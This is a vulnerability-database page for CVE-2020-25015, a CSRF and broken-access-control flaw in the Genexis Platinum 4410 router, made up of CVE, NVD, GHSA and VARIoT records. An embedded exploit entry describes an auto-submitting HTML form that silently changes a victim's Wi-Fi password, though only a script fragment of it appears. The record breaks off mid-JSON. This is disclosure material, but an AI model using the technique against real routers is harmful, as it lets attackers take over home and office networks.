CVE-2020-25015 (GCVE-0-2020-25015)

Vulnerability from cvelistv5

Published

2020-09-16 17:34

Modified

2024-08-04 15:26

Severity ?

CWE

Summary

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/	Exploit, Third Party Advisory
cve@mitre.org	https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/	Exploit, Third Party Advisory

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T15:26:09.700Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-11-09T20:06:16",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-25015",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/",
              "refsource": "MISC",
              "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
            },
            {
              "name": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/",
              "refsource": "MISC",
              "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
            },
            {
              "name": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-25015",
    "datePublished": "2020-09-16T17:34:23",
    "dateReserved": "2020-08-28T00:00:00",
    "dateUpdated": "2024-08-04T15:26:09.700Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2020-25015\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2020-09-16T18:15:13.390\",\"lastModified\":\"2024-11-21T05:16:31.130\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password.\"},{\"lang\":\"es\",\"value\":\"Un enrutador espec\u00edfico permite cambiar la contrase\u00f1a de Wi-Fi de forma remota.\u0026#xa0;Genexis Platinum 4410 versi\u00f3n V2-1.28, un enrutador compacto que se usa generalmente en hogares y oficinas, se encontr\u00f3 que es vulnerable a un control de acceso roto y a CSRF, que pueden ser combinados para cambiar de forma remota la contrase\u00f1a del punto de acceso WIFI\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:N/I:P/A:N\",\"baseScore\":4.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-352\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.28:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FCFCA821-8738-455C-B1E3-74F2E6EE290F\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:genexis:platinum_4410:2.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B7711B98-A395-467D-8698-97A2C90CC1F5\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}"
  }
}

ghsa-6gfp-9cvf-5g87

Vulnerability from github

Published

2022-05-24 22:28

Modified

2022-11-16 19:00

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2020-25015"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-09-16T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password.",
  "id": "GHSA-6gfp-9cvf-5g87",
  "modified": "2022-11-16T19:00:32Z",
  "published": "2022-05-24T22:28:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25015"
    },
    {
      "type": "WEB",
      "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410"
    },
    {
      "type": "WEB",
      "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

fkie_cve-2020-25015

Vulnerability from fkie_nvd

Published

2020-09-16 18:15

Modified

2024-11-21 05:16

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Summary

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/	Exploit, Third Party Advisory
cve@mitre.org	https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/	Exploit, Third Party Advisory

Impacted products

	Vendor	Product	Version
	genexis	platinum_4410_firmware	p4410-v2-1.28
	genexis	platinum_4410	2.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "FCFCA821-8738-455C-B1E3-74F2E6EE290F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:genexis:platinum_4410:2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B7711B98-A395-467D-8698-97A2C90CC1F5",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password."
    },
    {
      "lang": "es",
      "value": "Un enrutador espec\u00edfico permite cambiar la contrase\u00f1a de Wi-Fi de forma remota.\u0026#xa0;Genexis Platinum 4410 versi\u00f3n V2-1.28, un enrutador compacto que se usa generalmente en hogares y oficinas, se encontr\u00f3 que es vulnerable a un control de acceso roto y a CSRF, que pueden ser combinados para cambiar de forma remota la contrase\u00f1a del punto de acceso WIFI"
    }
  ],
  "id": "CVE-2020-25015",
  "lastModified": "2024-11-21T05:16:31.130",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-09-16T18:15:13.390",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

gsd-2020-25015

Vulnerability from gsd

Modified

2023-12-13 01:21

Details

Aliases

CVE-2020-25015

Aliases

CVE-2020-25015

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2020-25015",
    "description": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password.",
    "id": "GSD-2020-25015",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2020-25015"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2020-25015"
      ],
      "details": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password.",
      "id": "GSD-2020-25015",
      "modified": "2023-12-13T01:21:57.348036Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2020-25015",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/",
            "refsource": "MISC",
            "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
          },
          {
            "name": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/",
            "refsource": "MISC",
            "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
          },
          {
            "name": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.28:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:genexis:platinum_4410:2.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-25015"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-352"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
            },
            {
              "name": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
            },
            {
              "name": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/159936/Genexis-Platinum-4410-P4410-V2-1.28-Missing-Access-Control-CSRF.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2022-11-16T14:14Z",
      "publishedDate": "2020-09-16T18:15Z"
    }
  }
}

A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF

Date: 28-08-2020

Vendor Homepage: https://www.gxgroup.eu/ont-products/

Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)

Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/

Version: v2.1 (software version P4410-V2-1.28)

CVE : CVE-2020-25015

Proof of Concept

Create an HTML file with the following code:

history.pushState('', '', '/') document.forms[0].submit();

Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD

PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
Timeline

Vulnerability reported to the Genexis team – August 28, 2020 Team confirmed firmware release containing fix – September 14, 2020

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202009-0727",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "platinum 4410",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "genexis",
        "version": "p4410-v2-1.28"
      },
      {
        "model": "platinum-4410",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "genexis",
        "version": null
      },
      {
        "model": "platinum-4410",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "genexis",
        "version": "genexis platinum-4410  firmware  2-1.28"
      },
      {
        "model": "platinum",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "genexis",
        "version": "4410v2-1.28"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25015"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jinson Varghese Behanan",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "159936"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2020-25015",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2020-25015",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2020-56086",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
